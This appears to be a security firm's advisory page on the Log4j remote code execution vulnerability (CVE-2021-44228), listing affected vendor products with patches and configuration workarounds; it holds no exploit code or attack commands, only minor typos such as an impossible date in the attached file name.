Apache LOG4J Remote Code Execution Zero Day Vulnerability (CVE-2021-44228)

Overview

A remote-code execution vulnerability has been found in the prolific Java logging library

Log4j. This can allow an attacker to execute arbitrary code on software using this library,

which can then likely lead to the full attacker compromise of the underlying server. This

library is used in a significant number of applications, and can affect internally developed

and 3rd party applications. We are strongly advising everyone to review all internally

developed and 3rd party applications for their potential exposure to this Log4j vulnerability.


We will continue to update this page with updates as new information becomes available.



Security Advisory Details

CVE 2021-44228 is a critical remote code execution vulnerability that exploits the Apache Log4j2 library which can be found in a significant number of applications and platforms. In versions prior to 2.14.1 features used in configuration, log messages, and parameters do not protect against an attacker exploiting the Log4j mechanism to execute remote code on the vulnerable system. An attacker who can generate a log messages can execute arbitrary code which can in the worst case provide full system access when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases greater that 2.10 this behavior can be mitigated by disabling lookups in log event messages.


Keep yourself protected

  • Update to version 2.15 (or higher if available) immediately. Apply the update to resolve the vulnerability as soon as it is released by the affected Vendors.

  • In versions greater than 2.10 set the JVM Option - log4j2.formatMsgNoLookups=true

  • Utilise security monitoring to detect incoming JNDI attacks using crafted messages or HTTP requests and responses.


Affected products

A significant number of products from multiple vendors are affected, and investigations are still on-going as to which products and services are affected. We have provided a summary of some of the more notably affected software applications below.

Vendor

Product(s)

Affected Version(s)

Mitigation / Remediation

Further Information

Apache

Log4j

All log4j-core versions between 2.0-beta9 and 2.14.1

Update to verions 2.15.0


In releases >=2.10, setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.


For releases >=2.7 and <=2.14.1, see link for more information.

Atlassian

Jira Server & Data Center


Confluence Server & Data Center

On-premesis


Only vulnerable when using non-default config, cloud version still under investigation

Disabling any configured appenders utilising org.apache.log4j.JMSAppender by commenting out the relevant lines in your Log4j configuration file and restarting the application

DatadogHQ

Datadog Agent

6 to 6.32.2

7 to 7.32.2


JMX monitoring component leverages an impacted version of log4j

Update to 7.32.2 - impacted library is still included however they have taken the recommended precautions to disable vulnerable logic

F-Secure

Endpoint ProxyPolicy ManagerPolicy Manager Proxy

13,14,15

Download the patch from the F-Secure server

Graylog

​Graylog

< 3.3.15

< 4.0.14

< 4.1.9

< 4.2.3

Graylog development team incorporated this fix into all supported versions of the platform (v3.3.15, v4.0.14, v4.1.9, and v4.2.3). 


For any version under 3.3.15, upgrade or

apply a change to the Graylog startup configuration.

Puppet

Continuous Delivery for Puppet Enterprise

3.x

< 4.10.2

Update available for version 4.x

Mitigations for 3.x which is EOL

Symantec

Symantec Endpoint Protection Manager

14.3

  1. Set the system environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true".

  2. Restart the SEPM system services.

Ubiquiti

​UniFI Network Application

< 6.5.54

Upgrade to UniFi Network Application 6.5.54

VMware

Carbon Black Cloud Workload Appliance

1.x

Patch Pending

​VMWare

Horizon

8.x, 7.x

Patch pending


Workaround: edit registry with -Dlog4j2.formatMsgNoLookups=true

​VMWare

Site Recovery Manager

​8.x

Patch Pending


Workaround available, see link.

VMWare

vCenter Server (Windows & Virtual Appliance)

6.x

7.x

Patches Pending Workarounds available, see links.

A more comprehensive list of affected vendors and software applications is being maintained at: https://github.com/NCSC-NL/log4shell/tree/main/software


See our original advisory notification below.

2021-13-12 - Crossword Labs Security Advisory - Java Log4j Logging Library v3
.pdf
Download PDF • 1.83MB